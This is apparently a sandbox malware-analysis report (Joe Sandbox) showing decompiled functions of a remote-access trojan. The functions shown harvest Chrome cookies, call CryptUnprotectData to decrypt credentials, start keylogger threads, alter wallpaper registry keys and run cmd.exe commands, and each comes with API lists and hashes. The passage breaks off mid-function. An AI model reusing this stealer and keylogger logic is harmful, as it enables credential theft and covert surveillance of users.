                    • Opcode ID: 4f99e93415464d5738f8b0ec0c1dd26b56c598080a7d5787abd8bcea82267666
                    • Instruction ID: 0665d5b14a1e4b9cb67c1a99571701ed5e9b0677a739cf7a3229819190da0774
                    • Opcode Fuzzy Hash: 4f99e93415464d5738f8b0ec0c1dd26b56c598080a7d5787abd8bcea82267666
                    • Instruction Fuzzy Hash: 88518271E00109AFEF14DFA9C881AAEF7B5EF48318F24416FE854E7341D6799E068B54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004165EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132threadwindowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 95%
                    			E004165EC(void* __edi, struct HWND__* _a4) {
				short _v604;
				char _v632;
				void* _v636;
				char _v656;
				void* _v660;
				char _v680;
				void* _v684;
				char _v704;
				void* _v708;
				char _v728;
				void* _v732;
				char _v752;
				void* _v756;
				char _v776;
				void* _v780;
				char _v800;
				void* _v804;
				char _v824;
				void* _v828;
				char _v848;
				void* _v852;
				char _v872;
				void* _v876;
				char _v896;
				void* _v900;
				char _v920;
				void* _v924;
				char _v940;
				char _v944;
				void* _v948;
				char _v964;
				char _v968;
				void* _v972;
				char _v988;
				long _v992;
				intOrPtr _v996;
				void* __ebx;
				void* __ebp;
				int _t50;
				void* _t54;
				void* _t56;
				signed int _t87;
				struct HWND__* _t149;
				void* _t152;

				_t147 = __edi;
				_push(_t87);
				_t149 = _a4;
				GetWindowThreadProcessId(_t149,  &_v992);
				E0041A6E9(_t87,  &_v940, _t149);
				E0041A6E9(_t87,  &_v964, _v992);
				GetWindowTextW(_t149,  &_v604, 0x12c);
				_t50 = IsWindowVisible(_t149);
				_t156 = _t50;
				_t88 = _t87 & 0xffffff00 | _t50 != 0x00000000;
				E0040415E(_t87 & 0xffffff00 | _t50 != 0x00000000,  &_v988, _v992, _t152,  &_v604);
				_t54 = E0041A879(_t87 & 0xffffff00 | _t50 != 0x00000000,  &_v656, E0041AB76( &_v632, _v996));
				_t56 = E0041A879(_t88,  &_v680,  &_v992);
				L00403356(E00408832(_t88,  &_v920, E00402E81( &_v896, E00408832(_t88,  &_v872, E00402EF0(_t88,  &_v848, E00408832(_t88,  &_v824, E00402E81( &_v800, E00408832(_t88,  &_v776, E00402EF0(_t88,  &_v752, E00408832(_t88,  &_v728, E0041A6E9(_t88,  &_v704, _t88 & 0x000000ff), __edi, _t152, _t50, 0x46a788), _t152, _t156,  &_v944), __edi, _t152, _t156, 0x46a788), _t56), __edi, _t152, _t156, 0x46a788), _t152, _t156,  &_v968), _t147, _t152, _t156, 0x46a788), _t54), _t147, _t152, _t156, 0x46a630));
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401EE9();
				E00401EE9();
				E00401FB8();
				E00401FB8();
				return 1;
			}















































                    0x004165ec
                    0x004165f8
                    0x004165fa
                    0x00416603
                    0x0041660f
                    0x0041661c
                    0x0041662f
                    0x00416636
                    0x0041663c
                    0x0041664a
                    0x0041664d
                    0x00416670
                    0x0041668d
                    0x00416730
                    0x00416739
                    0x00416742
                    0x0041674e
                    0x0041675a
                    0x00416766
                    0x00416772
                    0x0041677e
                    0x0041678a
                    0x00416796
                    0x004167a2
                    0x004167ae
                    0x004167ba
                    0x004167c6
                    0x004167cf
                    0x004167d8
                    0x004167e1
                    0x004167ee

                    APIs
                    • GetWindowThreadProcessId.USER32(?,?), ref: 00416603
                    • GetWindowTextW.USER32 ref: 0041662F
                    • IsWindowVisible.USER32 ref: 00416636
                      • Part of subcall function 0041AB76: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041AB8B
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$Process$OpenTextThreadVisible
                    • String ID: h5G
                    • API String ID: 478698014-4077671695
                    • Opcode ID: 57e314817de64fc6c7a8f4a46e538bb9a44f2cd3452858200bb4f184f874004f
                    • Instruction ID: 99c6d8f7261b3cee98e9cdba014bcc0a4643868b1acb47591d6874b1b0f6d138
                    • Opcode Fuzzy Hash: 57e314817de64fc6c7a8f4a46e538bb9a44f2cd3452858200bb4f184f874004f
                    • Instruction Fuzzy Hash: E241E4311082419BC324FB65D891DDFF3E9AFD4354F50893EF48A921E1EF349A4ACA5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041B35B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                    Download Yara Rule
                    C-Code - Quality: 27%
                    			E0041B35B(void* __ecx, void* __edx) {
				void* __ebx;
				char* _t10;
				void* _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t28;
				void* _t32;
				void* _t34;

				_t21 = __edx;
				_t24 = __edx;
				_t12 = __ecx;
				if(_t12 == 0) {
					_push(1);
					_t28 = _t27 - 0x18;
					_t10 = "0";
					E00402073(_t10, _t28, __edx, _t26, _t10);
					_t25 = "Control Panel\\Desktop";
					_push("WallpaperStyle");
					_t22 = "Control Panel\\Desktop";
					E00412A57(_t28, "Control Panel\\Desktop");
					_push(1);
					_t14 = _t28 + 0x20 - 0x18;
					_push(_t10);
					goto L11;
				} else {
					_t15 = _t12 - 1;
					if(_t15 == 0) {
						_push(1);
						_t32 = _t27 - 0x18;
						_t16 = _t32;
						_push("2");
						goto L7;
					} else {
						_t17 = _t15 - 1;
						if(_t17 == 0) {
							_push(1);
							_t32 = _t27 - 0x18;
							_t16 = _t32;
							_push("10");
							goto L7;
						} else {
							_t18 = _t17 - 1;
							if(_t18 == 0) {
								_push(1);
								_t32 = _t27 - 0x18;
								_t16 = _t32;
								_push("6");
								L7:
								E00402073(_t10, _t16, _t21, _t26);
								_t25 = "Control Panel\\Desktop";
								_push("WallpaperStyle");
								_t22 = "Control Panel\\Desktop";
								E00412A57(_t16, "Control Panel\\Desktop");
								_push(1);
								_t14 = _t32 + 0x20 - 0x18;
								_push("0");
								goto L11;
							} else {
								if(_t18 == 1) {
									_push(1);
									_t34 = _t27 - 0x18;
									E00402073(_t10, _t34, __edx, _t26, "0");
									_t25 = "Control Panel\\Desktop";
									_push("WallpaperStyle");
									_t22 = "Control Panel\\Desktop";
									E00412A57(_t34, "Control Panel\\Desktop");
									_push(1);
									_t14 = _t34 + 0x20 - 0x18;
									_push("1");
									L11:
									E00402073(_t10, _t14, _t22, _t26);
									E00412A57(_t14, _t25);
								}
							}
						}
					}
				}
				return SystemParametersInfoW(0x14, 0, _t24, 3);
			}

















                    0x0041b35b
                    0x0041b35e
                    0x0041b360
                    0x0041b363
                    0x0041b407
                    0x0041b409
                    0x0041b40c
                    0x0041b414
                    0x0041b419
                    0x0041b41e
                    0x0041b423
                    0x0041b425
                    0x0041b42d
                    0x0041b432
                    0x0041b434
                    0x00000000
                    0x0041b369
                    0x0041b369
                    0x0041b36c
                    0x0041b3f9
                    0x0041b3fb
                    0x0041b3fe
                    0x0041b400
                    0x00000000
                    0x0041b372
                    0x0041b372
                    0x0041b375
                    0x0041b3eb
                    0x0041b3ed
                    0x0041b3f0
                    0x0041b3f2
                    0x00000000
                    0x0041b377
                    0x0041b377
                    0x0041b37a
                    0x0041b3b8
                    0x0041b3ba
                    0x0041b3bd
                    0x0041b3bf
                    0x0041b3c4
                    0x0041b3c4
                    0x0041b3c9
                    0x0041b3ce
                    0x0041b3d3
                    0x0041b3d5
                    0x0041b3dd
                    0x0041b3e2
                    0x0041b3e4
                    0x00000000
                    0x0041b37c
                    0x0041b37f
                    0x0041b385
                    0x0041b387
                    0x0041b391
                    0x0041b396
                    0x0041b39b
                    0x0041b3a0
                    0x0041b3a2
                    0x0041b3aa
                    0x0041b3af
                    0x0041b3b1
                    0x0041b435
                    0x0041b435
                    0x0041b441
                    0x0041b446
                    0x0041b37f
                    0x0041b37a
                    0x0041b375
                    0x0041b36c
                    0x0041b459

                    APIs
                    • SystemParametersInfoW.USER32 ref: 0041B450
                      • Part of subcall function 00412A57: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00412A66
                      • Part of subcall function 00412A57: RegSetValueExA.KERNELBASE(?,00465480,00000000,?,00000000,00000000,00473238,?,?,0040ED96,00465480,4.6.0 Pro), ref: 00412A8E
                      • Part of subcall function 00412A57: RegCloseKey.KERNELBASE(?,?,?,0040ED96,00465480,4.6.0 Pro), ref: 00412A99
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateInfoParametersSystemValue
                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                    • API String ID: 4127273184-3576401099
                    • Opcode ID: 4be5f40bc9e41d6f9aa7a56090a1d1fea2c663ada0fa1de368a3a68577051258
                    • Instruction ID: 353071605875722e2d2290b0d1df67e202755458c4192b98c6391b796ea34086
                    • Opcode Fuzzy Hash: 4be5f40bc9e41d6f9aa7a56090a1d1fea2c663ada0fa1de368a3a68577051258
                    • Instruction Fuzzy Hash: 96114D32F8061036D918317A4E1BBAE28068786F50F55815FFB013A2C6E5CF5AB143CF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040BB66 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                    Download Yara Rule
                    C-Code - Quality: 95%
                    			E0040BB66(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t22;
				int _t32;
				void* _t59;
				void* _t63;
				void* _t64;
				void* _t66;
				void* _t67;

				_t59 = __edx;
				_t40 = __ebx;
				_t63 = __ecx;
				E0040BEC3(__ecx);
				E0040BA3D(__ebx,  &_v52, _t59, __ecx, __eflags);
				E004087F0( &_v28,  &_v52, _t67, L"User Data\\Default\\Network\\Cookies");
				_t22 = PathFileExistsW(E00401EE4( &_v28));
				_t69 = _t22;
				if(_t22 != 0) {
					E0040BE24(__ebx, _t63, _t67, _t69,  &_v28);
				}
				E00401EF3( &_v28,  &_v52, _t64, E004087F0( &_v76,  &_v52, _t67, L"User Data\\Profile ?\\Network\\Cookies"));
				E00401EE9();
				_t66 = 1;
				do {
					_push(E0041A762(_t40,  &_v76, _t66));
					E0040BECD(E0040245C() - 0x11,  &_v76);
					E00401EE9();
					_t32 = PathFileExistsW(E00401EE4( &_v28));
					_t71 = _t32;
					if(_t32 != 0) {
						E0040BE24(_t40, _t63, _t67, _t71,  &_v28);
					}
					_t66 = _t66 + 1;
				} while (_t66 < 0x64);
				E00401EE9();
				E00401EE9();
				return _t63;
			}
















                    0x0040bb66
                    0x0040bb66
                    0x0040bb6e
                    0x0040bb70
                    0x0040bb78
                    0x0040bb88
                    0x0040bb97
                    0x0040bb9d
                    0x0040bb9f
                    0x0040bba7
                    0x0040bba7
                    0x0040bbc1
                    0x0040bbc9
                    0x0040bbd0
                    0x0040bbd1
                    0x0040bbdb
                    0x0040bbec
                    0x0040bbf4
                    0x0040bc02
                    0x0040bc08
                    0x0040bc0a
                    0x0040bc12
                    0x0040bc12
                    0x0040bc17
                    0x0040bc18
                    0x0040bc20
                    0x0040bc28
                    0x0040bc34

                    APIs
                      • Part of subcall function 0040BA3D: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,0040BB7D,?), ref: 0040BA70
                    • PathFileExistsW.SHLWAPI(00000000,?), ref: 0040BB97
                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040BC02
                    Strings
                    • User Data\Default\Network\Cookies, xrefs: 0040BB7D
                    • User Data\Profile ?\Network\Cookies, xrefs: 0040BBAC
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                    • API String ID: 1174141254-1980882731
                    • Opcode ID: 99c7e4874861133ee03dbd62fe3fe4db4b543edd9fa5d0ea7d7a46575ae185ed
                    • Instruction ID: d3bd7a9e1c96093492625e3e5ee86b1017f979b14bb93b73e7de0ea03ad3c358
                    • Opcode Fuzzy Hash: 99c7e4874861133ee03dbd62fe3fe4db4b543edd9fa5d0ea7d7a46575ae185ed
                    • Instruction Fuzzy Hash: F521E2719101195ACB04F7A6DC96CEEB7B8EE50718B44003FF901B21E2EF789946C6DC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040A461 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E0040A461(void* __ecx, void* __edx) {
				char _v28;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t7;
				void* _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_t31 = __ecx;
				_t38 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					 *((char*)(__ecx + 0x4a)) = 1;
					E00402073(_t18,  &_v28, __edx, _t32, "Online Keylogger Started");
					_t34 = _t33 - 0x18;
					E0041A7B9(_t33 - 0x18,  &_v28);
					E0040A6DA(_t18, _t31, _t38);
					E00401FB8();
					E00402073(_t18, _t34 - 0x18,  &_v28, _t32, "Online Keylogger Started");
					E00402073(_t18, _t34,  &_v28, _t32, "i");
					E0041A04A(_t18, "Online Keylogger Started");
					if( *((intOrPtr*)(_t31 + 0x49)) == 0) {
						if( *_t31 == 0) {
							CreateThread(0, 0, E0040986A, _t31, 0, 0);
						}
						CreateThread(0, 0, E0040988C, _t31, 0, 0);
					}
					return CreateThread(0, 0, E00409898, _t31, 0, 0);
				}
				return _t7;
			}












                    0x0040a469
                    0x0040a46c
                    0x0040a470
                    0x0040a47b
                    0x0040a483
                    0x0040a488
                    0x0040a490
                    0x0040a497
                    0x0040a49f
                    0x0040a4aa
                    0x0040a4b9
                    0x0040a4be
                    0x0040a4d1
                    0x0040a4d5
                    0x0040a4e1
                    0x0040a4e1
                    0x0040a4ed
                    0x0040a4ed
                    0x00000000
                    0x0040a4f9
                    0x0040a501

                    APIs
                      • Part of subcall function 0040A6DA: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A6E8
                      • Part of subcall function 0040A6DA: wsprintfW.USER32 ref: 0040A769
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    • CreateThread.KERNEL32 ref: 0040A4E1
                    • CreateThread.KERNEL32 ref: 0040A4ED
                    • CreateThread.KERNEL32 ref: 0040A4F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread$LocalTime$wsprintf
                    • String ID: Online Keylogger Started
                    • API String ID: 112202259-1258561607
                    • Opcode ID: 9b11fab870bc5f2c31dcf5d4c9043d72623101c97d598f2e78c98917e69f52de
                    • Instruction ID: 2918f94b29e643706cc8194107c31a37d0557916cfe4d3346365f420470abdd0
                    • Opcode Fuzzy Hash: 9b11fab870bc5f2c31dcf5d4c9043d72623101c97d598f2e78c98917e69f52de
                    • Instruction Fuzzy Hash: 4501A1A5A003083EE62076769C8ADBF7A6CCA92398F40057FF545222C3D9BD1D5582FA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004060D7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 28%
                    			E004060D7(intOrPtr __ecx, char __edx, char* _a4) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				_Unknown_base(*)()* _t11;
				intOrPtr _t18;
				intOrPtr _t24;
				char* _t26;
				void* _t29;
				char* _t32;

				_t11 =  *0x470af4; // 0x0
				_v16 = __ecx;
				_v20 = __edx;
				if(_t11 == 0) {
					_t11 = GetProcAddress(LoadLibraryA("crypt32"), "CryptUnprotectData");
					 *0x470af4 = _t11;
				}
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v20);
				if( *_t11() == 0) {
					return 0;
				} else {
					_t24 = _v12;
					_t26 = _a4;
					if(_t24 == 0) {
						L7:
						 *((char*)(_t24 + _t26)) = 0;
						return _v12;
					}
					_t32 = _t26;
					_t29 = _v8 - _t26;
					_t18 = _t24;
					do {
						 *_t32 =  *((intOrPtr*)(_t29 + _t32));
						_t32 = _t32 + 1;
						_t18 = _t18 - 1;
					} while (_t18 != 0);
					goto L7;
				}
			}













                    0x004060dd
                    0x004060e2
                    0x004060e5
                    0x004060ea
                    0x004060fd
                    0x00406103
                    0x00406103
                    0x0040610b
                    0x0040610e
                    0x0040610f
                    0x00406110
                    0x00406111
                    0x00406112
                    0x00406116
                    0x0040611b
                    0x00000000
                    0x0040611d
                    0x0040611d
                    0x00406120
                    0x00406125
                    0x00406141
                    0x00406141
                    0x00000000
                    0x00406145
                    0x0040612d
                    0x0040612f
                    0x00406131
                    0x00406133
                    0x00406136
                    0x00406138
                    0x00406139
                    0x00406139
                    0x00000000
                    0x00406140

                    APIs
                    • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,0040609F,?,00000000,?), ref: 004060F6
                    • GetProcAddress.KERNEL32(00000000), ref: 004060FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: CryptUnprotectData$crypt32
                    • API String ID: 2574300362-2380590389
                    • Opcode ID: 5deaecffb08fff2b823b0b74764ae02e5ae7b43c49087b2fd004d2f9456ea8b6
                    • Instruction ID: beb262a90158fb4cf50087408c2c088a9110264107d79c3b72559a6e192aff88
                    • Opcode Fuzzy Hash: 5deaecffb08fff2b823b0b74764ae02e5ae7b43c49087b2fd004d2f9456ea8b6
                    • Instruction Fuzzy Hash: 75012831A04315ABCF18CFACDC409ABBBB8EF54300F0002BEE956E7341D675D9008798
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040513C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E0040513C() {
				void* __ebx;
				void* __ecx;
				long _t19;
				void* _t24;
				intOrPtr _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				void* _t33;
				intOrPtr _t40;

				_t31 = _t24;
				 *((intOrPtr*)(_t31 + 0x78)) = 0;
				if( *((intOrPtr*)(_t31 + 0x74)) <= 0) {
					L3:
					 *((char*)(_t31 + 0x5c)) = 0;
					_t40 =  *0x470d48; // 0x0
					if(_t40 != 0) {
						_t34 = _t33 - 0x18;
						E00402073(0, _t33 - 0x18, _t29, _t32, "Connection Timeout");
						E00402073(0, _t34 - 0x18, _t29, _t32, "E");
						E0041A04A(0, _t30);
					}
					E00404E06(_t29);
					return 1;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t19 = WaitForSingleObject( *(_t31 + 0x60), 0x3e8);
					 *((intOrPtr*)(_t31 + 0x78)) =  *((intOrPtr*)(_t31 + 0x78)) + 1;
					_t28 =  *((intOrPtr*)(_t31 + 0x78));
					if(_t19 == 0) {
						break;
					}
					if(_t28 <  *((intOrPtr*)(_t31 + 0x74))) {
						continue;
					}
					goto L3;
				}
				CloseHandle( *(_t31 + 0x60));
				 *(_t31 + 0x60) = 0;
				 *((char*)(_t31 + 0x5c)) = 0;
				SetEvent( *(_t31 + 0x64));
				return 0;
			}














                    0x0040513f
                    0x00405143
                    0x00405149
                    0x00405168
                    0x00405168
                    0x0040516b
                    0x00405171
                    0x00405173
                    0x0040517d
                    0x0040518c
                    0x00405191
                    0x00405196
                    0x0040519b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040514b
                    0x0040514b
                    0x00405153
                    0x00405159
                    0x0040515c
                    0x00405161
                    0x00000000
                    0x00000000
                    0x00405166
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405166
                    0x004051aa
                    0x004051b3
                    0x004051b6
                    0x004051b9
                    0x00000000

                    APIs
                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                    • CloseHandle.KERNEL32(?), ref: 004051AA
                    • SetEvent.KERNEL32(?), ref: 004051B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandleObjectSingleWait
                    • String ID: Connection Timeout
                    • API String ID: 2055531096-499159329
                    • Opcode ID: 30c97919601a0bafcd1ec3cc362548623f5d588fc2a5b0f78b24e89b2ef7ef86
                    • Instruction ID: 87dc7bd1a7f2c12f2d5d2db554b8500d969d653d79ad8885273b8c0985c03cd0
                    • Opcode Fuzzy Hash: 30c97919601a0bafcd1ec3cc362548623f5d588fc2a5b0f78b24e89b2ef7ef86
                    • Instruction Fuzzy Hash: 1401F531A44B40AFE7226B36DC4551B7FD0FF01301700097FF18356AA2DA78A440CF5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040DCC9 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                    Download Yara Rule
                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040DD37
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                    • API String ID: 2005118841-1866435925
                    • Opcode ID: 6211aa1379568c384751f3f23f8808a2a799c885f71157578241e55c7260a878
                    • Instruction ID: c83b488e6c0b567c715bed89e41106fb5d46d583803a0575b5f187d309fe0aa3
                    • Opcode Fuzzy Hash: 6211aa1379568c384751f3f23f8808a2a799c885f71157578241e55c7260a878
                    • Instruction Fuzzy Hash: 5401D6B1E487087AE714EAD5CC13FBA77685F10705F50403FB906761C2EABC6549CA2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00415181 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00415181(void* __edx, void* __ebp, void* __eflags, char _a16, char _a52, void* _a76, char _a80, void* _a152, void* _a176) {
				void* _t11;

				_t41 = __eflags;
				_t11 = E0040415E(0,  &_a80, __edx, __ebp, E00401F8B(E00401E45( &_a16, __edx, __ebp, __eflags, 0)));
				_t35 = L"/C ";
				ShellExecuteW(0, L"open", L"cmd.exe", E00401EE4(E004042DC(0,  &_a52, L"/C ", __ebp, _t41, _t11)), 0, 0);
				E00401EE9();
				E00401EE9();
				E00401E6D( &_a16, _t35);
				E00401FB8();
				E00401FB8();
				return 0;
			}




                    0x00415181
                    0x0041519b
                    0x004151a1
                    0x004151c3
                    0x004151cd
                    0x00415c96
                    0x0041611c
                    0x00416128
                    0x00416134
                    0x00416141

                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell
                    • String ID: /C $cmd.exe$open
                    • API String ID: 587946157-3896048727
                    • Opcode ID: fa60b287fd240e61623fdd592e520166bb37bdd1ca281026a9f2703f3b00b510
                    • Instruction ID: b910b50d10bf9c10a53822f7bfccbc49879064c70acfec78918e038c0e9cbf8d
                    • Opcode Fuzzy Hash: fa60b287fd240e61623fdd592e520166bb37bdd1ca281026a9f2703f3b00b510
                    • Instruction Fuzzy Hash: ADF012712083045AC314FBB2DC959AFB3E8AB90319F500C3FB546611E2EF389959C65A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040D4AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E0040D4AA(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v16;
				signed int _t34;
				signed int* _t49;
				signed int* _t57;
				void* _t65;
				signed int* _t66;

				_t65 = __ecx;
				E00433BCB(__ecx, 0);
				E0040F09D(__ecx + 4);
				E0040F09D(__ecx + 0xc);
				E0040F087(__ecx + 0x14);
				E0040F087(__ecx + 0x1c);
				E0040F09D(__ecx + 0x24);
				E0040F09D(__ecx + 0x2c);
				_t76 = _a4;
				if(_a4 == 0) {
					_t49 =  &_v16;
					E0040D455(_t49, "bad locale name");
					E004379F6( &_v16, 0x46cce0);
					asm("int3");
					_push(_t65);
					_t66 = _t49;
					E00433F5E(_t66);
					E0040F082( &(_t66[0xb]));
					E0040F082( &(_t66[9]));
					E0040F082( &(_t66[7]));
					E0040F082( &(_t66[5]));
					E0040F082( &(_t66[3]));
					E0040F082( &(_t66[1]));
					_t57 = _t66;
					_t34 =  *_t57;
					__eflags = _t34;
					if(_t34 == 0) {
						return E004441D1(4);
					} else {
						__eflags = _t34 - 8;
						if(_t34 < 8) {
							_t37 = 0x470060 + _t34 * 0x18;
							__eflags = 0x470060 + _t34 * 0x18;
							return E00434470(0x470060 + _t34 * 0x18, _t37);
						}
						return _t34;
					}
				} else {
					E00433F13(__ebx, __edx, __edi, _t76, __ecx, _a4);
					return _t65;
				}
			}









                    0x0040d4b3
                    0x0040d4b5
                    0x0040d4bd
                    0x0040d4c5
                    0x0040d4cd
                    0x0040d4d5
                    0x0040d4dd
                    0x0040d4e5
                    0x0040d4ea
                    0x0040d4ee
                    0x0040d509
                    0x0040d50c
                    0x0040d51a
                    0x0040d51f
                    0x0040d520
                    0x0040d521
                    0x0040d524
                    0x0040d52d
                    0x0040d535
                    0x0040d53d
                    0x0040d545
                    0x0040d54d
                    0x0040d555
                    0x0040d55a
                    0x00433c23
                    0x00433c25
                    0x00433c27
                    0x004441f9
                    0x00433c2d
                    0x00433c2d
                    0x00433c30
                    0x00433c35
                    0x00433c35
                    0x00000000
                    0x00433c40
                    0x00433c41
                    0x00433c41
                    0x0040d4f0
                    0x0040d4f4
                    0x0040d501
                    0x0040d501

                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040D4B5
                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040D4F4
                      • Part of subcall function 00433F13: _Yarn.LIBCPMT ref: 00433F32
                      • Part of subcall function 00433F13: _Yarn.LIBCPMT ref: 00433F56
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D51A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                    • String ID: bad locale name
                    • API String ID: 3628047217-1405518554
                    • Opcode ID: 3a02377a2724e7e0b0981669c52285330c9c09d789ecaff2d36644942b4f7900
                    • Instruction ID: 7d5d85bd939eae65a08207342b5a69e68fd95b80f34b046828c98c3172fb135a
                    • Opcode Fuzzy Hash: 3a02377a2724e7e0b0981669c52285330c9c09d789ecaff2d36644942b4f7900
                    • Instruction Fuzzy Hash: 72F0A4314446049AC334FF61D853A9FB3689F14758F90453FF686228D7EF38AA0CC699
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00412903 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 77%
                    			E00412903(void* __ecx, void* __edx, short* _a4, char _a8) {
				void* _v8;
				int _v12;
				char _v2060;
				void* __ebp;
				void* _t19;
				void* _t23;
				void* _t24;

				_t22 = __edx;
				_v12 = 0x400;
				_t23 = __ecx;
				if(RegOpenKeyExW(__edx, _a4, 0, 0x20019,  &_v8) != 0) {
					_push(0x46a8f0);
				} else {
					_t6 =  &_a8; // 0x40e830
					RegQueryValueExW(_v8,  *_t6, 0, 0,  &_v2060,  &_v12);
					RegCloseKey(_v8);
